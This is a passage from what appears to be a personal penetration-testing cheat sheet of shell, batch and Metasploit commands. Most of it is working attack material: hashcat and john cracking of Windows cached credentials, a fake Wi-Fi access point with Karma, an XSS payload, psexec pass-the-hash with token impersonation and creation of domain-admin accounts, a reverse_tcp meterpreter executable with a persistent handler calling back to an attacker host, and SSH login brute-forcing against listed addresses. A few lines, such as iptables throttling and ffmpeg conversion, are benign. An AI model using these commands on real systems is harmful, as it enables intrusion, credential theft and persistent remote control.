2723%BIN% %OPTS% --hash-type 1100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
2724%BIN% %OPTS% --hash-type 1400 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2725%BIN% %OPTS% --hash-type 1500 aaaaaaaaaaaaw ?1?1?1?1?1?1?1?1 --gpu-accel 80
2726%BIN% %OPTS% --hash-type 1600 $apr1$aaaaaaaa$aaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1 --gpu-loops 1000
2727%BIN% %OPTS% --hash-type 2100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
2728%BIN% %OPTS% --hash-type 2400 aaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2729%BIN% %OPTS% --hash-type 2500 test.hccap ?1?1?1?1?1?1?1?1
2730%BIN% %OPTS% --hash-type 2611 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaa ?1?1?1?1?1?1?1?1
2731%BIN% %OPTS% --hash-type 2711 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2732%BIN% %OPTS% --hash-type 2811 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaa ?1?1?1?1?1?1?1?1
2733sq
2734
2735# ocl hashcat plus examples:
2736
2737
2738
2739all Rule based attack:
2740FOR /F "delims==" %%A IN ('DIR/B/S ".\rules\"') DO cudaHashcat-plus32.exe -a 0 -r "%%A" -m1100 -o out.txt "mscache2" "C:\egb\Dictionaries\rockyou.txt"
2741
2742
2743
2744
2745
2746rem example brute by char to 7 max chars in ~5min with GTX 560 example hash '2d9f0b052932ad18b87f315641921cda:user' password is password ...
2747cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1
2748cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1
2749cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1
2750cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1
2751cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1
2752cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1?1
2753
2754
2755rem example Hybrid attack rockyou.txt wordlist+MASK to 4 chars
2756cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1"
2757cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1"
2758cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1?1"
2759
2760
2761rem same as above with 1337 speek wordlist+MASK to 4 chars
2762cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1"
2763cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1"
2764cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1?1"
2765
2766rem example Hybrid attack rockyou.txt wordlist+MASK to 4 chars digi and some special chars only ...
2767cudaHashcat-plus32.exe -o out.txt -a6 -1 "?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1?1"
2768
2769rem example Hybrid attack 1337 speekt wordlist+MASK to 4 chars digi and some special chars only ...
2770cudaHashcat-plus32.exe -o out.txt -a6 -1 "?d!@#$-().*_" -m1100 "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1?1"
2771
2772
2773
2774
2775rem dammit I give up ... 6hrs .. for 7char brute
2776cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1?1?1
2777
2778
2779REM really !?!? example 8 char brute ( 18 days on GTX 560 )
2780cudaHashcat-plus32.exe -o out.txt -a3 -1 ?l?u?d!@#$-().*_ -m1100 mscache2 ?1?1?1?1?1?1?1?1
2781
2782eneric hash types:
2783Hash-Mode Hash-Name Example
27840 MD5 8743b52063cd84097a65d1633f5c74f5
278510 md5($pass.$salt) 01dfae6e5d4d90d9892622325959afbe:7050461
278620 md5($salt.$pass) f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
278730 md5(unicode($pass).$salt) b31d032cfdcf47a399990a71e43c5d2a:144816
278840 md5($salt.unicode($pass)) d63d0e21fdc05f618d55ef306c54af82:13288442151473
278950 HMAC-MD5 (key = $pass) fc741db0a2968c39d9c2a5cc75b05370:1234
279060 HMAC-MD5 (key = $salt) bfd280436f45fa38eaacac3b00518f29:1234
2791100 SHA1 b89eaac7e61417341b710b727768294d0e6a277b
2792110 sha1($pass.$salt) 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
2793120 sha1($salt.$pass) cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
2794130 sha1(unicode($pass).$salt) c57f6ac1b71f45a07dbd91a59fa47c23abcd87c2:631225
2795140 sha1($salt.unicode($pass)) 5db61e4cd8776c7969cfd62456da639a4c87683a:8763434884872
2796150 HMAC-SHA1 (key = $pass) c898896f3f70f61bc3fb19bef222aa860e5ea717:1234
2797160 HMAC-SHA1 (key = $salt) d89c92b4400b15c39e462a8caa939ab40c3aeeea:1234
2798190 sha1(LinkedIn) b89eaac7e61417341b710b727768294d0e6a277b
2799200 MySQL323 7196759210defdc0
2800300 MySQL4.1/MySQL5+ FCF7C1B8749CF99D88E5F34271D636178FB5D130
2801400 phpass, MD5(Wordpress),
2802MD5(Joomla) $P$984478476IagS59wHZvyQMArzfx58u.
2803400 phpass, MD5(phpBB3) $H$984478476IagS59wHZvyQMArzfx58u.
2804500 md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5 2 $1$28772684$iEwNOgGugqO9.bIz5sk8k/
2805800 SHA-1(Django) sha1$$b89eaac7e61417341b710b727768294d0e6a277b
2806900 MD4 afe04867ec7a3845145579a95f72eca7
28071000 NTLM b4b9b02e6f09a9bd760f388b67351e2b
28081100 Domain Cached Credentials, mscash 4dd8965d1d476fa0d026722989a6b772:3060147285011
28091400 SHA256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
28101410 sha256($pass.$salt) c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4:53743528
28111420 sha256($salt.$pass) eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617
28121430 sha256(unicode($pass).$salt) 4cc8eb60476c33edac52b5a7548c2c50ef0f9e31ce656c6f4b213f901bc87421:890128
28131440 sha256($salt.unicode($pass)) a4bd99e1e0aba51814e81388badb23ecc560312c4324b2018ea76393ea1caca9:12345678
28141450 HMAC-SHA256 (key = $pass) abaf88d66bf2334a4a8b207cc61a96fb46c3e38e882e6f6f886742f688b8588c:1234
28151460 HMAC-SHA256 (key = $salt) 8efbef4cec28f228fa948daaf4893ac3638fbae81358ff9020be1d7a9a509fc6:1234
28161500 descrypt, DES(Unix), Traditional DES 48c/R8JAv757A
28171600 md5apr1, MD5(APR), Apache MD5 2 $apr1$71850310$gh9m4xcAn3MGxogwX/ztb.
28181700 SHA512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f
28191710 sha512($pass.$salt) e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd:6352283260
28201720 sha512($salt.$pass) 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a:2613516180127
28211730 sha512(unicode($pass).$salt) 13070359002b6fbb3d28e50fba55efcf3d7cc115fe6e3f6c98bf0e3210f1c6923427a1e1a3b214c1de92c467683f6466727ba3a51684022be5cc2ffcb78457d2:341351589
28221740 sha512($salt.unicode($pass)) bae3a3358b3459c761a3ed40d34022f0609a02d90a0d7274610b16147e58ece00cd849a0bd5cf6a92ee5eb5687075b4e754324dfa70deca6993a85b2ca865bc8:1237015423
28231750 HMAC-SHA512 (key = $pass) 94cb9e31137913665dbea7b058e10be5f050cc356062a2c9679ed0ad6119648e7be620e9d4e1199220cd02b9efb2b1c78234fa1000c728f82bf9f14ed82c1976:1234
28241760 HMAC-SHA512 (key = $salt) 7cce966f5503e292a51381f238d071971ad5442488f340f98e379b3aeae2f33778e3e732fcc2f7bdc04f3d460eebf6f8cb77da32df25500c09160dd3bf7d2a6b:1234
28251800 sha512crypt, SHA512(Unix) 2 $6$52450745$k5ka2p8bFuSmoVT1tzOyyuaREkkKBcCNqoDKzYiJL9RaE8yMnPgh2XzzF0NDrUhgrcLwg78xs1w5pJiypEdFX/
28262100 Domain Cached Credentials2, mscash2 $DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f
28272400 Cisco-PIX MD5 dRRVnUmUHXOTt9nk
28282410 Cisco-ASA MD5 02dMBMYkTdC5Ziyp:36
28292500 WPA/WPA2 1 http://hashcat.net/misc/example_hashes/hashcat.hccap
28302600 Double MD5 a936af92b0ae20b1ff6c3347a72e5fbe
28313000 LM 299bd128c1101fd6
28323100 Oracle 7-10g, DES(Oracle) 7A963A529D2E3229:3682427524
28333200 bcrypt, Blowfish(OpenBSD) $2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6
28343300 MD5(Sun) 3 $md5$rounds=904$iPPKEBnEkp3JV8uX$0L6m7rOFTVFn.SGqo2M9W1
28353500 md5(md5(md5($pass))) 9882d0778518b095917eb589f6998441
28363610 md5(md5($salt).$pass) 7b57255a15958ef898543ea6cc3313bc:1234
28373710 md5($salt.md5($pass)) 95248989ec91f6d0439dbde2bd0140be:1234
28383720 md5($pass.md5($salt)) 10ce488714fdbde9453670e0e4cbe99c:1234
28393810 md5($salt.$pass.$salt) 2e45c4b99396c6cb2db8bda0d3df669f:1234
28403910 md5(md5($pass).md5($salt)) 250920b3a5e31318806a032a4674df7e:1234
28414010 md5($salt.md5($salt.$pass)) 30d0cf4a5d7ed831084c5b8b0ba75b46:1234
28424110 md5($salt.md5($pass.$salt)) b4cb5c551a30f6c25d648560408df68a:1234
28434210 md5($username.0.$pass) 09ea048c345ad336ebe38ae5b6c4de24:1234
28444300 md5(strtoupper(md5($pass))) b8c385461bb9f9d733d3af832cf60b27
28454400 md5(sha1($pass)) 288496df99b33f8f75a7ce4837d1b480
28464500 Double SHA1 3db9184f5da4e463832b086211af8d2314919951
28474600 sha1(sha1(sha1($pass))) dc57f246485e62d99a5110afc9264b4ccbfcf3cc
28484700 sha1(md5($pass)) 92d85978d884eb1d99a51652b1139c8279fa8663
28494800 MD5(Chap), iSCSI CHAP authentication afd09efdd6f8ca9f18ec77c5869788c3:01020304050607080910111213141516:01
28505000 SHA-3(Keccak) 203f88777f18bb4ee1226627b547808f38d90d3e106262b5de9ca943b57137b6
28515100 Half MD5 8743b52063cd8409
28525200 Password Safe SHA-256 http://hashcat.net/misc/example_hashes/hashcat.psafe3
28535300 IKE-PSK MD5 http://hashcat.net/misc/example_hashes/hashcat.ikemd5
28545400 IKE-PSK SHA1 http://hashcat.net/misc/example_hashes/hashcat.ikesha1
28555500 NetNTLMv1-VANILLA / NetNTLMv1+ESS u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
28565600 NetNTLMv2 admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
28575700 Cisco-IOS SHA256 2btjjy78REtmYkkW0csHUbJZOstRXoWdX1mGrmmfeHI
28585800 Samsung Android Password/PIN 0223b799d526b596fe4ba5628b9e65068227e68e:f6d45822728ddb2c
28596000 RipeMD160 012cb9b334ec1aeb71a9c8ce85586082467f7eb6
28606100 Whirlpool 7ca8eaaaa15eaa4c038b4c47b9313e92da827c06940e69947f85bc0fbef3eb8fd254da220ad9e208b6b28f6bb9be31dd760f1fdb26112d83f87d96b416a4d258
28616211 PBKDF2-HMAC-RipeMD160/AES http://hashcat.net/misc/example_hashes/hashcat_ripemd160.tc
28626221 PBKDF2-HMAC-SHA512/AES http://hashcat.net/misc/example_hashes/hashcat_sha512.tc
28636231 PBKDF2-HMAC-Whirlpool/AES http://hashcat.net/misc/example_hashes/hashcat_whirlpool.tc
28646241 PBKDF2-HMAC-RipeMD160-boot/AES http://hashcat.net/misc/example_hashes/hashcat_ripemd160_boot.tc
28656300 AIX {smd5} {smd5}a5/yTL/u$VfvgyHx1xUlXZYBocQpQY0
28666400 AIX {ssha256} {ssha256}06$aJckFGJAB30LTe10$ohUsB7LBPlgclE3hJg9x042DLJvQyxVCX.nZZLEz.g2
28676500 AIX {ssha512} {ssha512}06$bJbkFGJAB30L2e23$bXiXjyH5YGIyoWWmEVwq67nCU5t7GLy9HkCzrodRCQCx3r9VvG98o7O3V0r9cVrX3LPPGuHqT5LLn0oGCuI1..
28686600 1Password, Agile Keychain http://hashcat.net/misc/example_hashes/hashcat.agilekeychain
28696700 AIX {ssha1} {ssha1}06$bJbkFGJAB30L2e23$dCESGOsP7jaIIAJ1QAcmaGeG.kr
28706800 Lastpass 1, 4 a2d1f7b7a1862d0d4a52644e72d59df5:500:lp@trash-mail.com
28716900 GOST R 34.11-94 df226c2c6dcb1d995c0299a33a084b201544293c31fc3d279530121d36bbcea9
28727000 Fortigate (FortiOS) AK1AAECAwQFBgcICRARNGqgeC3is8gv2xWWRony9NJnDgEA
28737100 OS X v10.8 / v10.9 $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222
28747200 GRUB 2 grub.pbkdf2.sha512.10000.7d391ef48645f626b427b1fae06a7219b5b54f4f02b2621f86b5e36e83ae492bd1db60871e45bc07925cecb46ff8ba3db31c723c0c6acbd4f06f60c5b246ecbf.26d59c52b50df90d043f070bd9cbcd92a74424da42b3666fdeb08f1a54b8f1d2f4f56cf436f9382419c26798dc2c209a86003982b1e5a9fcef905f4dfaa4c524
28757300 IPMI2 RAKP HMAC-SHA1 b7c2d6f13a43dce2e44ad120a9cd8a13d0ca23f0414275c0bbe1070d2d1299b1c04da0f1a0f1e4e2537300263a2200000000000000000000140768617368636174:472bdabe2d5d4bffd6add7b3ba79a291d104a9ef
28767400 sha256crypt, SHA256(Unix) 2 $5$rounds=5000$GX7BopJZJxPc/KEK$le16UF8I2Anb.rOrn22AUPWvzUETDGefUmAV8AZkGcD
28777500 Kerberos 5 AS-REQ Pre-Auth $krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363631363132333238383835
28787700 SAP CODVN B (BCODE) 435748802305$70AE4FF6C945B78F
28797800 SAP CODVN F/G (PASSCODE) 034488234401$3F9CB8B0EFC58A8536DC0121794F672A626D78FB
28807900 Drupal7 $S$C33783772bRXEx1aCsvY.dqgaaSu76XmVlKrW9Qu8IQlvxHlmzLf
28818000 Sybase ASE 0xc00778168388631428230545ed2c976790af96768afa0806fe6c0da3b28f3e132137eac56f9bad027ea2
28828100 Citrix Netscaler 1765058016a22f1b4e076dccd1c3df4e8e5c0839ccded98ea
28838200 1Password, Cloud Keychain http://hashcat.net/misc/example_hashes/hashcat.cloudkeychain
28848300 DNSSEC (NSEC3) 7b5n74kq8r441blc2c5qbbat19baj79r:.lvdsiqfj.net:33164473:1
28858400 WBB3, Woltlab Burning Board 3 8084df19a6dc81e2597d051c3d8b400787e2d5a9:6755045315424852185115352765375338838643
28868500 RACF $racf$*USER*FC2577C6EBE6265B
28878600 Lotus Notes/Domino 5 3dd2e1e5ac03e230243d58b8c5ada076
28888700 Lotus Notes/Domino 6 (GDpOtD35gGlyDksQRxEU)
28899999 Plaintext hashcat
2890
28911 password: hashcat!
28922 rounds=[# of iterations] is optional here, after signature, e.g. $5$rounds=5000
28933 as in 2 but the number of rounds must be specified
28944 the hash used here is not the one send via e.g. the web-interface to lastpass servers (pbkdf2_sha256_hex (pbkdf2_sha256 ($pass, $email, $iterations), $pass, 1) but instead the one stored (by e.g. your browser or the pocket version) to disk, opera/chrome for instance use local sqlite databases, firefox uses files with ending _lpall.slps - for linux: 2nd line is interesting / base64 decode it, for win see here - and _key.itr
2895
2896Specific hash types:
2897Hash-Mode Hash-Name Example
289811 Joomla < 2.5.18 19e0e8d91c722e7091ca7a6a6fb0f4fa:547180318425216517577853af0389f093b181ae26452015f4ae728:user603028777
289921 osCommerce, xt:Commerce 374996a5e8a5e57fd97d893f7df79824:36
290022 Juniper Netscreen/SSG (ScreenOS) nNxKL2rOEkbBc9BFLsVGG6OtOUO/8n:user
290123 Skype 3af0389f093b181ae26452015f4ae728:user
2902101 nsldap, SHA-1(Base64), Netscape LDAP SHA {SHA}uJ6qx+YUFzQbcQtyd2gpTQ5qJ3s=
2903111 nsldaps, SSHA-1(Base64), Netscape LDAP SSHA {SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
2904112 Oracle 11g ac5f1e62d21fd0529428b84d42e8955b04966703:38445748184477378130
2905121 SMF >= v1.1 ecf076ce9d6ed3624a9332112b1cd67b236fdd11:17782686
2906122 OS X v10.4, v10.5, v10.6 1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683
2907123 EPi 0x326C6D7B4E4F794B79474E36704F35723958397163735263516265456E31 0xAFC55E260B8F45C0C6512BCE776C1AD8312B56E6
2908131 MSSQL(2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
2909132 MSSQL(2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
2910133 PeopleSoft uXmFVrdBvv293L9kDR3VnRmx4ZM=
2911141 EPiServer 6.x < v4 $episerver$*0*bEtiVGhPNlZpcUN4a3ExTg==*utkfN0EOgljbv5FoZ6+AcZD5iLk
29121421 hMailServer 8fe7ca27a17adc337cd892b1d959b4e487b8f0ef09e32214f44fb1b07e461c532e9ec3
29131441 EPiServer 6.x >= v4 $episerver$*1*MDEyMzQ1Njc4OWFiY2RlZg==*lRjiU46qHA7S6ZE7RfKUcYhB85ofArj1j7TrCtu3u6Y
29141711 SSHA-512(Base64), LDAP {SSHA512} {SSHA512}ALtwKGBdRgD+U0fPAy31C28RyKYx7+a8kmfksccsOeLknLHv2DBXYI7TDnTolQMBuPkWDISgZr2cHfnNPFjGZTEyNDU4OTkw
29151722 OS X v10.7 648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d
29161731 MSSQL(2012), MSSQL(2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
29172611 vBulletin < v3.8.5 16780ba78d2d5f02f3202901c1b6d975:568
29182612 PHPS $PHPS$34323438373734$5b07e065b9d78d69603e71201c6cf29f
29192711 vBulletin >= v3.8.5 bf366348c53ddcfbd16e63edfdd1eee6:181264250056774603641874043270
29202811 IPB2+, MyBB1.2+ 8d2129083ef35f4b365d5d87487e1207:47204
29213711 Mediawiki B type $B$56668501$0ce106caa70af57fd525aeaf80ef2898
29223721 WebEdition CMS fa01af9f0de5f377ae8befb03865178e:5678
29237600 Redmine Project Management Web App 536befdaffc3e2215e481aded7e32134906a673b:1234
2924
2925
2926
2927# more examples hashes cracked john
2928
2929user:2d9f0b052932ad18b87f315641921cda:lab:lab.internal
2930Service currently active. Stopping service...
2931Service successfully removed.
2932
2933John Plugin:
2934$ ./john -format:mscash ./mscash.txt
2935Loaded 1 password hash (M$ Cache Hash [mscash])
2936password (user
2937
2938
2939
2940# set power profile via command line
2941
2942Powercfg.exe /SETACTIVE "Always On"
2943Powercfg.exe /SETACTIVE "Max Battery"
2944
2945#Remove the .NET Credentials (Stored User names and Passwords)
2946Control keymgr.dll
2947
2948
2949# convert amr to mp3
2950ffmpeg -i file.amr -vn -acodec libmp3lame -ac 2 -ab 96k file.mp3
2951FOR /F "delims==" %%A IN ('DIR/B "*.amr"') DO ffmpeg -i %%A -vn -acodec libmp3lame -ac 2 -ab 96k %%A.mp3
2952
2953
2954#windows saved passwords
2955rundll32.exe keymgr.dll, KRShowKeyMgr
2956
2957# check for mod date range
2958find / -type f -newermt 2011-10-01 ! -newermt 2012-04-30
2959
2960# openvas on 11.10
2961take src out of the sources.list
2962add --http-only to the /etc/init.d/greenbone-security-assistant startup script
2963
2964# mass set path
2965export PATH=$PATH:`find /usr/lib/ruby/1.9.1 -type d | sed 's/$/:/g' | tr -d '\n'`
2966
2967
2968
2969# top web ports ports
297080-83,99,100,443,631,800,1000,1739,2002,2301,2381,3000,5800,5988,5989,8000-8080,808,8099,8100-8105,8443,8888,8900,9999,10000
2971
2972# more web ports
297310080,10100,10243,10250,10251,1027,1029,1030,1032,10439,10444,11267,1183,1184,11869,11905,11910,11935,1208,13080,1416,14176,14654,16000,16080,16372,17012,18083,1818,18180,1830,1831,19000,19082,19091,19101,1947,1972,19740,2002,2030,20444,2130,2140,21988,2301,2316,2381,2414,2424,24305,2480,2523,25684,25825,2693,27775,280,28080,2851,2869,30444,30900,31458,31459,3201,3227,32843,3339,34988,35135,35145,3526,3617,3790,37922,3842,3914,3938,4036,4053,41647,4220,4239,4343,443,45000,4680,47001,4723,48018,4848,4864,49152,49157,50000,50001,50038,51785,51905,51908,5225,53001,5357,5440,5447,5449,5469,54850,5500,5501,554,5554,55885,56414,56737,57423,57772,57773,5800,5801,591,593,5985,5989,60000,6001,6002,6003,6004,60213,61000,6107,6108,6113,6114,6160,6161,631,6325,6453,6454,65084,65093,6842,7001,7002,7003,7070,7099,7126,7191,7359,7453,7454,7717,7751,80,8000,8001,8002,8003,8004,8008,8020,8070,8071,8077,8080,8081,8082,8083,8085,8086,8087,8088,8090,8093,8094,8095,8099,81,8107,8113,8114,8115,8118,8120,8123,8126,8133,8135,8138,815,8150,8151,8180,82,8200,8222,8260,8300,8323,8333,84,8444,85,8530,8533,86,8660,8666,8701,8703,8732,8733,8740,8878,8880,8888,8889,8900,90,9000,9001,9002,9005,9006,9073,9080,9081,9084,9086,9087,9090,9091,9191,9300,9310,9444,9501,9510,9595,9642,9675,9676,9797,9823,9887
2974
2975#sap ports
297632000,33000,34000,36000,47000,48000,21-23,25,21-23,25,80-83,53,110,135,139,445,3128,1433,1521,3306,3389,5900,6001,8080,8888,80-83,53,110,135,139,445,3128,1433,1521,3306,3389,5900,6001,8080,8888,99,100,443,631,800,1000,1739,2002,2301,2381,3000,5800,5988,5989,8000-8015,8080-8083,8099,8100-8105,8443,8888,8900,9999,10000
2977
2978# common proxy ports
297980,81,82,83,84,85,86,443,808,3128,6515,6666,8000,8001,8008,8080,8081,8088,8090,8118,8181,8888,8909,9000,9090,54321
2980
2981
2982
2983
2984
2985
2986# nslookup to CSV
2987for i in `cat FULL` ;do echo "IP$i";nslookup $i|grep 'name ='|sed 's/.*name = /,/g'|sed 's/\.$//g';done| tr -d '\n' | awk '{gsub("IP","\n"); print}'
2988
2989
2990# my-ip-neighbors lookup
2991# 200 at a time .. you need to change the -x to a proxy that works .. rmccurdy.com/scripts/proxy/good.txt
2992# test google before you start ..
2993# curl -x 184.171.175.14:808 http://google.com etc ..
2994
2995
2996for i in `cat FULL`;do echo curl -x 184.171.175.14:808 "\""http://www.my-ip-neighbors.com/?domain=$i"\"";done > go
2997bash -x go > out
2998
2999# grep the output for all the goodies and make it nice CSV
3000egrep "(\"http:\/\/whois\.domaintools\.com|domain\" value=\")" out | sed 's/.*domain\" value=\"/IP /g' | sed 's/\"\/>.*//g' | sed 's/.*domaintools.com\//,/g' | sed 's/" t.*//g' | tr -d '\n' | awk '{gsub("IP","\n"); print}'
3001
3002
3003
3004
3005
3006# block port 80 throttle
3007iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 4 -j REJECT
3008#ssh block stuff fu
3009iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH
3010iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 8 --rttl --name SSH -j DROP
3011
3012
3013
3014
3015# CURL HTTPS
3016for i in `cat check`;do echo curl -L -k --location-trusted -m 3 -L -o $i.htm "\""https://$i"\"";done > https
3017
3018
3019# airbase/karma.rc setup
3020
3021
3022--------------------
3023
3024gogogo
3025----------------
3026
3027# change eth1 to internet interface
3028iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
3029iptables --append FORWARD --in-interface at0 -j ACCEPT
3030echo 1 > /proc/sys/net/ipv4/ip_forward
3031
3032
3033# kill stuff the will cause issues ..
3034killall dhcpd3 dhclient dhclient3 dhcpcd dhcpd
3035
3036# start MSF karma.rc script logs are screenlog.0 etc ..
3037xterm -e "screen -L /pentest/exploits/framework/msfconsole -r /stuff/karma.rc" &
3038
3039# takes a wile to startup .. lets wait we need it all ready to work before people connect to it so we dont miss packets !!!
3040
3041echo "waiting for MSF karma to start .. 50sec"
3042sleep 20
3043
3044# monitor mode change wlan1 to your wifi
3045airmon-ng start wlan1
3046
3047sleep 5
3048
3049# setup fake AP
3050xterm -e "airbase-ng -c 6 -P mon0 -v" &
3051
3052sleep 5
3053
3054ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 &
3055
3056# setup DHCP server
3057xterm -e "dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0" &
3058
3059# DEBUG DHCP to see DHCP request hits xterm -e "tcpdump -i at0 -n port 67 and port 68" &
3060
3061
3062------------------
3063
3064
3065
3066
3067# XSS
3068>"'><script>alert('XSS')</script>
3069# add full read write read/write full R/W on registry key
3070SetACL.exe -on "HKEY_LOCAL_MACHINE\Software\Microsoft\Policies" -ot reg -actn ace -ace "n:MyDomain\JohnDoe;p:full"
3071# add -P0 for no ping
3072/usr/bin/screen -fa -d -m nmap -T5 -p 20,21,80,115,443,989,990 -vvvv -sS -n --max-rtt-timeout 300ms --max-retries 1 192.30.0.0/16 -oA /home/administrator/rmccurdy/192.30.0.0_fast_ping
3073# msf metasploit use login to get msfshell for pivot/token
3074use exploit/windows/smb/psexec
3075
3076set RHOST 192.168.64.123
3077set SMBUser adminit
3078set SMBPass password
3079# also set HASHES !! set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
3080
3081exploit
3082
3083getuid
3084use priv
3085getsystem
3086use incognito
3087list_tokens -u
3088add_group_user "Domain Admins"
3089impersonate_token "DOMAIN\\user"
3090# add user and give it local admin
3091net user test PASSWORDHERE /add
3092net localgroup administrators test /add
3093
3094# add user to domain and makt it domain admin
3095net user /add USERNAME STRONGPASSWORD /domain
3096net group /add "domain admins" USERNAME /domain
3097
3098---------------------------
3099# make exe
3100./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.55 LPORT=443 R | ./msfencode -t exe -c 5 -o /tmp/bob.exe
3101
3102# attacker listen
3103use exploit/multi/handler
3104set PAYLOAD windows/meterpreter/reverse_tcp
3105set LHOST 192.168.6.55
3106set LPORT 443
3107set ExitOnSession false
3108# set AutoRunScript pathto script you want to autorun after exploit is run
3109set AutoRunScript persistence -r 192.168.6.55 -p 443 -A -X -i 30
3110
3111exploit -j -z
3112
3113
3114# armatage DONT USE THIS JUIST USE BIN INSTALL FROM WEBSITE .. INCLUDES FULL AND POSTGRES BINS
3115apt-get install mysql-server -y
3116/etc/init.d/mysql start
3117
3118mysqladmin -u root -ppassword password toor
3119/pentest/exploits/framework/msfrpcd -f -U msf -P test -t Basic
3120
3121# armatage DONT USE THIS METHOD USE THE BIN FROM WEBSITE IT HAS ITS OWN POSTGRES
3122
3123apt-get install -y postgresql
3124
3125apt-get install libpq-dev -y
3126
3127gem install postgres
3128
3129/etc/init.d/postgresql start
3130su -
3131su - postgres
3132
3133
3134createuser msf_user -P
3135createdb --owner=msf_user msf
3136
3137/pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
3138/pentest/exploits/framework/armitage
3139
3140
3141 ----
3142
3143
3144# ssh
3145use auxiliary/scanner/ssh/ssh_login
3146
3147#set RHOSTS_FILE "C:/backup/wordlist/targests.txt"
3148set RHOSTS 192.59.139.135 192.59.139.136 192.59.139.140 192.116.61.25 192.116.61.26 192.116.61.34
